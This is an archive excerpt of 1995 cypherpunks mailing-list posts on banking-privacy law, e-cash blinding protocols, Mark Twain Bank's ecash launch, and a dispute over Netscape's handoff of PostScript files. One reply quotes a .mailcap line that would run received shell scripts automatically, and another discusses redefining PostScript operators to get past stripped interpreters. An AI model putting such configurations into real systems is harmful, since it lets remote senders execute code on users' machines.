People could start off their day in the morning by clicking to download a
remailer (suitably signed) to their machine for a bit of cash earnings during
the time they will be away in a meeting. Heck java could do this =). No need
to worry about lunch money, get your machine to earn it.

You get the idea. Old and reliable isnt always what you want... too easy to
watch.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an224850@anon.penet.fi (scythe)
Date: Mon, 23 Oct 95 16:18:39 PDT
To: cypherpunks@toad.com
Subject: bank wiretapping law
Message-ID: <9510232303.AA06350@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



a law that allows government interception of banking data
for intelligence/counterespionage purposes without notification...



Date: Sun, 22 Oct 1995 03:11:05 -0400 (EDT)
From: The Gate <gate@id.WING.NET>
Subject: Foreign Intelligence To Become Alien Intelligence
To: snet-l@world.std.com



The following post make me think. What if the goverment could decide to 
interpret the meaning of the word foreign however they wanted. They could 
then say that anyone dealing with extra-terrestrials were foreigners, or 
that anyone not aligned with their thinking was a foreigner. I think 
that's the direction they're taking.

			Lee

On Sat, 21 Oct 1995, Brad Dolan wrote:

> 
> 
> ---------- Forwarded message ----------
> Date: Fri, 20 Oct 1995 18:07:35 -0700
> Subject: Lack of secrecy in U.S. Banks
> 
> 
> I ran across an interesting fragment of the U.S. Code.
> 
> Apparently, the Federal Government may access any banking records
> whatsoever if the Director of the FBI (or the Director's designee)
> certify that the information is sought for "foreign intelligence
> purposes."  Further, it is illegal for anybody to disclose that the
> records were turned over to the government, or even sought.  I do not
> know the penalties for disclosure.
> 
> The Attorney General appears to set guidelines for the dissemination
> of the information obtained through this law.  Note that if banking
> privacy is violated for reasons which are not related to
> counter-intelligence operations, the victim is unlikely to be in a
> position to seek relief from the courts because the privacy violation
> is likely to remain secret.
> 
> I've enclosed the law below.  I'm not a lawyer, so it raises more
> questions than it answers.  Perhaps the more skilled readers on the
> list will be able to deduce the implications.
> 
> The U.S. Code is available at http://www.pls.com:8001/his/usc.html
> 
> This particular law is available at the improbable URL:
> http://www.pls.com:8001/cgi-bin/taos_doc.pl?unix+0+uscode+17566+query+a+Government+authority+authorized+to+conduct+foreign+counter+%25BREAK%25+uscode%3a
> 
> Here is the law itself:
> 
> -CITE-
> 
>    12 USC Sec. 3414                                             01/24/94
> 
> -EXPCITE-
> 
>    TITLE 12 - BANKS AND BANKING
>    CHAPTER 35 - RIGHT TO FINANCIAL PRIVACY
> 
> -HEAD-
> 
>    Sec. 3414. Special procedures
> 
> -STATUTE-
> 
>      (a)(1) Nothing in this chapter (except sections 3415, 3417, 3418,
>    and 3421 of this title) shall apply to the production and
>    disclosure of financial records pursuant to requests from -
>        (A) a Government authority authorized to conduct foreign
>      counter- or foreign positive-intelligence activities for purposes
>      of conducting such activities; or
>        (B) the Secret Service for the purpose of conducting its
>      protective functions (18 U.S.C. 3056; 3 U.S.C. 202, Public Law
>      90-331, as amended).
>      (2) In the instances specified in paragraph (1), the Government
>    authority shall submit to the financial institution the certificate
>    required in section 3403(b) of this title signed by a supervisory
>    official of a rank designated by the head of the Government
>    authority.
>      (3) No financial institution, or officer, employee, or agent of
>    such institution, shall disclose to any person that a Government
>    authority described in paragraph (1) has sought or obtained access
>    to a customer's financial records.
>      (4) The Government authority specified in paragraph (1) shall
>    compile an annual tabulation of the occasions in which this section
>    was used.
>      (5)(A) Financial institutions, and officers, employees, and
>    agents thereof, shall comply with a request for a customer's or
>    entity's financial records made pursuant to this subsection by the
>    Federal Bureau of Investigation when the Director of the Federal
>    Bureau of Investigation (or the Director's designee) certifies in
>    writing to the financial institution that such records are sought
>    for foreign counterintelligence purposes and that there are
>    specific and articulable facts giving reason to believe that the
>    customer or entity whose records are sought is a foreign power or
>    an agent of a foreign power as defined in section 1801 of title 50.
>      (B) The Federal Bureau of Investigation may disseminate
>    information obtained pursuant to this paragraph only as provided in
>    guidelines approved by the Attorney General for foreign
>    intelligence collection and foreign counterintelligence
>    investigations conducted by the Federal Bureau of Investigation,
>    and, with respect to dissemination to an agency of the United
>    States, only if such information is clearly relevant to the
>    authorized responsibilities of such agency.
>      (C) On a semiannual basis the Attorney General shall fully inform
>    the Permanent Select Committee on Intelligence of the House of
>    Representatives and the Select Committee on Intelligence of the
>    Senate concerning all requests made pursuant to this paragraph.
>      (D) No financial institution, or officer, employee, or agent of
>    such institution, shall disclose to any person that the Federal
>    Bureau of Investigation has sought or obtained access to a
>    customer's or entity's financial records under this paragraph.
>      (b)(1) Nothing in this chapter shall prohibit a Government
>    authority from obtaining financial records from a financial
>    institution if the Government authority determines that delay in
>    obtaining access to such records would create imminent danger of -
>        (A) physical injury to any person;
>        (B) serious property damage; or
>        (C) flight to avoid prosecution.
>      (2) In the instances specified in paragraph (1), the Government
>    shall submit to the financial institution the certificate required
>    in section 3403(b) of this title signed by a supervisory official
>    of a rank designated by the head of the Government authority.
>      (3) Within five days of obtaining access to financial records
>    under this subsection, the Government authority shall file with the
>    appropriate court a signed, sworn statement of a supervisory
>    official of a rank designated by the head of the Government
>    authority setting forth the grounds for the emergency access.  The
>    Government authority shall thereafter comply with the notice
>    provisions of section 3409(c) of this title.
>      (4) The Government authority specified in paragraph (1) shall
>    compile an annual tabulation of the occasions in which this section
>    was used.
> 
> -SOURCE-
> 
>    (Pub. L. 95-630, title XI, Sec. 1114, Nov. 10, 1978, 92 Stat. 3707;
>    Pub. L. 97-320, title IV, Sec. 432(b), Oct. 15, 1982, 96 Stat.
>    1527; Pub. L. 99-569, title IV, Sec. 404, Oct. 27, 1986, 100 Stat.
>    3197.)
> 
> -REFTEXT-
> 
>                             REFERENCES IN TEXT
>      Public Law 90-331, as amended, referred to in subsec. (a)(1)(B),
>    is Pub. L. 90-331, June 6, 1968, 82 Stat. 170, as amended, which is
>    set out as a note under section 3056 of Title 18, Crimes and
>    Criminal Procedure.
> 
> -MISC2-
> 
>                                 AMENDMENTS
>      1986 - Subsec. (a)(5). Pub. L. 99-569 added par. (5).
>      1982 - Subsec. (b)(2). Pub. L. 97-320 struck out ''of'' after
>    ''financial institution''.
> 
> -SECREF-
> 
>                   SECTION REFERRED TO IN OTHER SECTIONS
>      This section is referred to in sections 3402, 3409, 3421 of this
>    title.
>   __________________________________________________________________________
> 
> 



--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 23 Oct 95 15:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510232223.XAA19030@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Tatu Ylonen (ylo@cs.hut.fi) wrote:
> You are aware that RSADSI claims they have exclusive licensing rights
> for DSA?

You are aware that Bidzos is full of shit?

Roger Schafly (sp?) addresses this issue in his lawsuit.  Hopefully this 
will be resolved soon.  The only problem is that Bidzo has made this claim 
on patents in other countries, not just USA, so he'd probably have to be 
sued throughout Europe also...  He sure does do a good job of making 
himself a pain in the ass even when he knows he's wrong.

Anyway, you could use ElGamal signatures instead, it is not patented.
The D-H and H-M patents do not cover digital signatures.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@cnet.com
Date: Mon, 23 Oct 95 23:31:44 PDT
Subject: Verification of Registration
Message-ID: <199510240631.XAA26526@zippity.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Your membership registration has been processed.  To become a full member
of c|net online, please return the text of this message (to verify@cnet.com).

The following magic token in this message [cypherpunks::752400770] will be automatically
processed to verify you.  Please note: The number included in the token is
*not* your password; the one to use on the site is the one you entered on
the registration form.

Please include the complete token appearing above, including the brackets.
The best way to return it to us is to include this entire message in your
reply.  If you mailer does not allow you to do this, retype or cut and
paste the magic token (including the square brackets) into a new message to
verify@cnet.com. If you are having difficulty completing this process,
please direct your questions to support@cnet.com.

Once you are verified you will be able to take advantage of the full
range of c|net online's services.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 24 Oct 95 00:35:59 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
Message-ID: <199510240734.AAA23451@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
>anonymous-remailer@shell.portal.com writes:
>> Clearly, someone has a vested interest which they are expending a 
>> great deal of effort to protect.  My email to Netscape detailing their 
>> logic bomb has gone unanswered, and unacknowledged for ten days now.
>
>Maybe because you're an idiot and they don't feel that its necessary
>to answer. What more need be said?

I see that Perry is as charming as ever?

Perry, I just don't think that it is wise to stick your head in the sand
and ignore a severe flaw in your algorithm, while actively misrepresenting
matters to those people who are not intimately familiar with the IETF. 

>Those of us who care run our postscript interpreters with all the
>dangerous commands stripped out, 

Perry, I'll call you on that one, cause you simply can't do it.  

Postscript isn't like any other language around.  Operator names have no
special significance to the interpreter.  You can't just "strip out" 
dangerous commands.  They aren't "reserved" in the sense that operator
names are in other languages, like COBOL or BASIC. 

In Postscript, operator names are simply keys into a LIFO dictionary. 
This makes Postscript different from other languages because you could
redefine these names if you wanted to.  Stripping something from a
dictionary doesn't matter because, the search sequence is top down.  

If I rewrite an operator name, and put it at the top of the stack, there's
not anything you can do.  

Gee's Perry, even if you haven't stripped something out, I can rewrite it. 
And the interpreter will find the rewritten version before the version
that's in your machine. 

And before someone attacks me for an inelegant "style" these potentially
confusing antics are routinely used under extraordinary circumstances.
There's no malice involved at all, simply real-world operation. 

And this is why the Request-For-Comments from the IETF warns:

   "Postscript is an extensible language, and many, if not most, 
    implementations of it provide their own extensions.  This document
    does not deal with such extensions explicitly since they constitute
    an unknown factor ..."

Is that clearer??  If you thought that you had "safety" cause you stripped
your interpreter, then you're in trouble, cause that doesn't work. 

> but given that Netscape doesn't supply postscript interpreters, its not 
> really their fault or problem.

Well, that line might work on those who don't know any better, but that's
also why the Internet Engineering Task Force (IETF) tries to protect the 
public by suggesting that implementors like Netscape not pass the ball:

    "The execution of general-purpose PostScript interpreters entails
     serious security risks, and implementors are discouraged from simply
     sending PostScript email bodies to "off-the-shelf" interpreters."

Netscape ignores this suggestion.  

I guess that Netscape simply knows more (or cares less??) than the entire
collected wisdom of the International contributors who make up the IETF. 

Gee, there's lotsa wisdom over there at Netscape.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 24 Oct 95 00:46:33 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510240746.AAA01967@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGxFBL.753@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> "Simon Spero" <ses@tipper.oit.unc.edu>  wrote:
>>> If so, there's 
>>> an obvious way to get two way anonymity with an on-line system. If Alice 
>>> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
>>> of the note, each with a serial number known only to Bob, then blind them 
>>> and send them to Alice. 
>>> 
>>> Alice would then reblind them and send them to Nick, the banker. Nick
>>> would then pick one of the notes, and ask Alice for the blinders for the
>>> rest. Alice would then ask Bob for his blinders for the rejected notes,
>>> and would forward both sets on to Nick, who would check them, and if
>>> they're legit, sign the remaning copy, and return it to Alice.  
>>> Alice cound then remove her blinding factor, and sent the result on to
>>> Bob. Bob then removes his blinding factor, and can now spend the coin. 

> This is an interesting idea but it is more complicated than necessary, I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.  The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verfifies that he is left with a signed number of the
> appropriate form.

> This system is in some ways the inverse of regular ecash.  Instead of
> Alice withdrawing a coin ahead of time, and Bob checking it with the bank
> right away, it is Alice who does the bank interaction at payment time,
> and Bob who waits before interacting with the bank.  The computational
> and communications costs do not seem much worse than ecash.

> There is no way Alice can double-spend because she cannot anticipate
> Bob's blinding factor and give him a previously-spent coin which will
> unblind to the proper form.  There could be an issue of fraud, though,
> where Bob insists that Alice's coin was no good even though it actually
> was.  Since he has blinded it she will have no way of recognizing it when
> he eventually deposits it.  In the current system this does not arise as
> Alice can always give him another copy of the coin and prove that it is
> good, and she can further determine if Bob has deposited it.  So some of
> the trust in the bank necessary with regular ecash gets replaced by trust
> between payee and payor in Simon Spero's system.

If Bob insists that the bank wouldn't redeem Alice's coin, that's not
Alice's fault.  The bank should have reserved the money when Alice
withdrew it.  Since nobody other than Bob sees the unblinded coin, it's
Bob's fault if somebody else spent it before Bob could.  In the case of
fraud by the bank, since the bank signed the coin, the bank should be
liable if it won't redeem it.

Perhaps the problem is that Bob insists that Alice's coin was not signed
by the bank.  In that case, how about this modification?  Alice should
first show Bob the doubly blinded coin she gave to the bank and the
signed doubly blinded coin she received back.  Bob can verify the
signature and then Alice can give him the blinding factor so he can
unblind it himself.  Bob also needs to sign the singly blinded coin that
he gives to Alice so that Alice can later show that she gave him the
correct blinding factor if Bob tries to claim that she didn't.

Are the any problems with this?

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 23 Oct 95 23:03:57 PDT
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
In-Reply-To: <199510240222.TAA03524@infinity.c2.org>
Message-ID: <Pine.SUN.3.90.951024005819.18976A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Well just another bit of information. On their FAQ they say to mail to 
shops@marktwain.com for more information on merchant accounts. Well the 
address does not exist. Not a very good start. I hope the get their act
together.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 23 Oct 95 22:51:06 PDT
To: owner-cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510240546.AA25372@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>their framework...it's the pluggable encryption that NSA has had such a hard
>time with but seems to be in favor of now.

What makes you say the NSA is in favor of pluggable crypto?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steveha@cix.compulink.co.uk (Steve Harris)
Date: Mon, 23 Oct 95 18:59:34 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <memo.878357@cix.compulink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In-Reply-To: <199510232235.SAA26441@opine.cs.umass.edu>
I'm well advanced with a Windows Pre-Mailer for use with Nymservers. The 
project was inspired by a very serious emotional support group I'm in. 
It's LISTSERV based and doesn't mix well with anon.penet.fi. Nymservers 
would be excellent for such purposes if they were easy to use. Hence this 
project.

I certainly don't want to create a Spammers tool. Right mow, I have put in 
space for managing up to 10 Nyms. I chose 10 because I thought it was more 
than anyone would want....



Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 23 Oct 95 18:04:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510240020.RAA24876@infinity.c2.org>
Message-ID: <199510240103.AA24584@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text


> 
> 	With the release of digicash I hope that we can soon make this
> stuff for-pay and much of the spam problem will be fixed. (Not all of
> it, of course.)
> 	(I am rather hesitatnt to setup an account with Mark Twain
> though.. $2,500 min balance and not FDIC insured?)
> 

It also sez thata maintenance fee of $10 (or so) will be imposed if the 
account has less then $250, so why not set up the account and deposit
$2500 and then withdraw $2200 leaving $300 ?

Or would that be "wrong" <g>

Regards,
 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 23 Oct 95 18:06:13 PDT
To: cypherpunks@toad.com
Subject: Similar Lists
Message-ID: <199510240105.CAA23370@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Looking for recommendations for any other mailing lists which allow one to stay current, on similar topics...

Thanks,
KTO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Tue, 24 Oct 95 05:19:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510240734.AAA23451@jobe.shell.portal.com>
Message-ID: <308CD9B4.23F20F8F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> 
> >Those of us who care run our postscript interpreters with all the
> >dangerous commands stripped out,
> 
> Perry, I'll call you on that one, cause you simply can't do it.
> 
> Postscript isn't like any other language around.  Operator names have no
> special significance to the interpreter.  You can't just "strip out"
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC.

You're talking about stripping them out *with PostScript code*, which
is obviously a dangerous proposition (but is still possible if you do
it right, and if systemdict is not read-only as it often is.)

If you strip them out by taking the source to the interpreter and
stripping them out there, then the PostScript code can be as malicious
as it likes; if the interpreter has no access to disk file primitives,
it can't read or write files, period.

If you don't have source to your interpreter, or it your interpreter
is deeply intertwingled with your OS or window system, obviously this
will be harder to do.  So in that case, you can run a different, 
smaller interpreter that you can isolate.  It's not like they aren't
widely available.

Of course, if the hypothetical cracker is going to take advantage of
buffer-overflow bugs in the interpreter to do what they want, then it
doesn't *matter* that it's a PostScript interpreter; at that point, 
it's just another buggy program.

> In Postscript, operator names are simply keys into a LIFO dictionary.
> This makes Postscript different from other languages because you could
> redefine these names if you wanted to.  Stripping something from a
> dictionary doesn't matter because, the search sequence is top down.
> 
> If I rewrite an operator name, and put it at the top of the stack, there's
> not anything you can do.
> 
> Gee's Perry, even if you haven't stripped something out, I can rewrite it.
> And the interpreter will find the rewritten version before the version
> that's in your machine.

I think it would be a really good trick to implement disk I/O in
PostScript that will work in an interpreter which didn't provide any
disk I/O routines in systemdict.

> And this is why the Request-For-Comments from the IETF warns:
> 
>    "Postscript is an extensible language, and many, if not most,
>     implementations of it provide their own extensions.  This document
>     does not deal with such extensions explicitly since they constitute
>     an unknown factor ..."
> 
> Is that clearer??  If you thought that you had "safety" cause you stripped
> your interpreter, then you're in trouble, cause that doesn't work.

Of course it works -- if you know what extensions the interpreter you're
running provides and if you've likewise turned off the dangerous ones.

> > but given that Netscape doesn't supply postscript interpreters, its not
> > really their fault or problem.
> 
> Well, that line might work on those who don't know any better, but that's
> also why the Internet Engineering Task Force (IETF) tries to protect the
> public by suggesting that implementors like Netscape not pass the ball:
> 
>     "The execution of general-purpose PostScript interpreters entails
>      serious security risks, and implementors are discouraged from simply
>      sending PostScript email bodies to "off-the-shelf" interpreters."
> 
> Netscape ignores this suggestion.

How?

As has been pointed out to you, repeatedly, we do not ship a PostScript
interpreter, and Netscape does not come configured to *look* for a
PostScript interpreter of any kind.  When you run it off-the-shelf, and
hand it a PostScript file, it says "I've never heard of this.  What do
you want to do with it?"

Just like it would with a perl script.  Or an awk script.  Or an sh
script.  Or a Microsoft Word document.  Or any other program capable
of file I/O or network connections.

The user picks the interpreter they want to hand the document to.
If anyone ignores this advice you keep repeating, it's the user.
Not us.

> I guess that Netscape simply knows more (or cares less??) than the entire
> collected wisdom of the International contributors who make up the IETF.

Stop, I'm getting chills.

> Gee, there's lotsa wisdom over there at Netscape.

I'm sure we all love you too.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 02:32:25 PDT
To: stripes@va.pubnix.com (Josh M. Osborne)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <9510240929.AA08313@all.net>
MIME-Version: 1.0
Content-Type: text


> In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> [...]
> >I strongly disagree.  If Netscape provided a way to execute shell
> >commands on your host from a remote computer, it would certainly be a
> >hole created by their product.  The fact that the default shell is
> >potentially dangerous means it's incumbant on those who provide access
> >to it to provide adequate protection.
> 
> They do, add:
> 
> application/x-shell; sh %s
> 
> to your .mailcap.
> 
> They had better stop supporting mailcap alltogether, after all *any*
> of the programs in there could have buffer overflows, or other
> security problems.  I'll bet some of them even do, anyone want to
> see if sox (a program that transforms sound files from format to
> format - frequently used to convert .wav files to .au files) has
> any overruns in the chunk handling code?

This is where the difference between your view and mine seem to part company.
I am not talking about some bug in postscript or the shell.  I am talking about
a program that grants remote access to run these programs in the normal manner,
which is unsafe.

To support the position you seem to be taking (and the one currently
taken by Netscape), you would have to say that the last several Sendmail
"bugs" were not sendmail problems but rather shell problems because all
sendmail did was allow you to execute a shell from the remote machine
(perhaps via a queue file).  You would also apparently say that it's
secure to allow a server to grant unlimited shell access to unknown,
unauthenticated remote users.  This seems foolhearty to me.

> >If Netscape wants to claim their product doesn't degrade security, they
> >should provide a safe postscript interpreter or not provide hooks to
> >unsafe ones.
> 
> Sure, and they had better find a way to keep us from editing the binary
> and adding whatever insecure features we may want to their program.

That's correct.  Secure software has to have secure distribution in
order to maintain its security when distributed through an untrusted
channel.  I think that Netscape uses an MD5 checksum which the members
of this list seem to place unlimited trust in (incorrectly in my view,
but that would be picking two nits with one keyboard entry).

> obcrypto: mabie it would be a good idea for programs to list problems that
> are beoynd their control.  To many people it may be supprising that anything
> in their .mailcap could hurt them.  To others it is hardly a shock and seeing
> alot of messages about it tends to get rather boreing, esp. as a few people
> jump up and down and yell about the Danger To Us All...

That's not true.  Certain things in their .mailcap file can create
holes, but not just anything.  One of the standard things we do in
external audits is look for files such as this and examine their
contents to see if unsafe configurations are in use. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Mon, 23 Oct 95 21:35:50 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <Pine.3.89.9510240512.A6071-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Douglas Barnes wrote:

> This extremely unprofessional, bungled launch does, I admit, make
> Mondex (with scads of beautiful marketing literature) look better all
> the time, although based on some conversations on Sunday, it appears
> that they may have _extremely serious_ architectural security problems.
> We'll see how things play out.
> 

MT Bank could clearly benefit from a Linux-type of advocacy and support.  
There are oodles of people out there with Desk Top Publishing equipment 
and graphics talents that could help MT/Digicash out.  Why should they?  
Simply, for the benefit of the net (remember that???).

Im sure some of the folks on the WEBS mailing list could start with a 
rehaul of their Web Page.  Lets see if we can get at least some pro bono 
design work for marketing materials for real ecash.  Talk it up in the 
newsgroups and whatever lists you are on.  Add it to your already to 
lengthy <g> .signature.

It does appear a clumsy announcement, but nonetheless, congrats to the 
folks at MT and Digicash for doing their best to make e-commerce a bit 
more safe.


> Later,
> 
> Doug
> 

Matt
--
Go to http://www.digicash.com/ecash.html
then to Mark Twain
then open account
then *spend, spend, spend*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an413572@anon.penet.fi
Date: Tue, 24 Oct 95 00:04:30 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510240654.AA27036@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>>   And if the security bug you find is severe as defined by Netscape, and
>>   hasn't been previously found, and can be reproduced by us, we'll write
>>   you a check for $1000. 
>
>Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
>the twelfth.  They haven't even returned an answer to my email yet nor
>even acknowledged its receipt. 
>
>Yep, I guess that their check is in the mail ....
>
>Alice de 'nonymous ...
Well, maybe if you'd remembered to put a real name on it,
they'd know where to send the check.  And maybe if your
"hacks" were so spectacular, you'd put your real name
on them too...  Now go away, Larry.

>                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
WTF?
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 06:58:19 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <199510241356.GAA01427@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


cman@communities.com (Douglas Barnes) writes:

>A technically-oriented NBFI
>could have done a much better job, without a lot of the "real bank"
>baggage, such as minimum deposits ($250, not $2,500, but still
>pretty steep for someone wanting to spend $.10 on something.)

I don't believe this is correct.  The $250 refers to foreign currency
accounts and is not relevant for ecash users.  The ecash account has an
account opening fee of $11 and a monthly fee of $5 for the low volume
user.  That is all the minimum there is, as I read it.  You can reduce
the per-month fee by paying more up front, but it isn't a net savings
until you've had the account open for about two years.

>My
>understanding is that the _bank account_ is FDIC insured, but not
>the ECash. I could be wrong -- their materials are extremely confusing
>and hard to follow.

It seems that there are three places "your" money can be: in the "World
Currency Access" account, where it is insured; in the "ecash mint", a
separate account at the bank, where it is not insured and in fact is
considered withdrawn (?); and in your ecash wallet on your computer disk.
You can transfer funds back and forth between your wallet and the "mint"
freely, but transfers are limited between the World Currency account and
the "mint" account.  It does seem like an odd approach, but perhaps there
are some legal reasons for doing it like this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 07:12:29 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510241410.HAA04523@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>Perhaps the problem is that Bob insists that Alice's coin was not signed
>by the bank.  In that case, how about this modification?  Alice should
>first show Bob the doubly blinded coin she gave to the bank and the
>signed doubly blinded coin she received back.  Bob can verify the
>signature and then Alice can give him the blinding factor so he can
>unblind it himself.  Bob also needs to sign the singly blinded coin that
>he gives to Alice so that Alice can later show that she gave him the
>correct blinding factor if Bob tries to claim that she didn't.

The problem with this is that Bob and the bank can now collude to trace
Alice, since he sees what she sent to the bank.  This is not as bad as in
the forward traceability case of regular ecash, because it happens after
Alice has completed her bank transaction, rather than before, but it
would be better to be untraceable since that is the whole point of this
variation.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 24 Oct 95 07:33:15 PDT
To: strick at Jihad <tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
Message-ID: <199510241432.HAA22965@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 AM 10/21/95 +0000, strick at Jihad wrote:
>Tim, a friend comments that if you're serious about getting
>reports this way, you should contact one of the human rights
>groups (Amnesty International, Article 19...) that gathers
>reports which are generally believed to be accurate under
>much more threatening situations.


This opinion of Amnesty is not universally held.

Amnesty has a political agenda, which causes it to overlooks certain
kinds of oppression in certain cases.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 24 Oct 95 04:23:59 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <Pine.LNX.3.91.951024071953.149B-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Name Withheld by Request wrote:

> The  <--(blinding)--- payer <--(blinding)--- payee
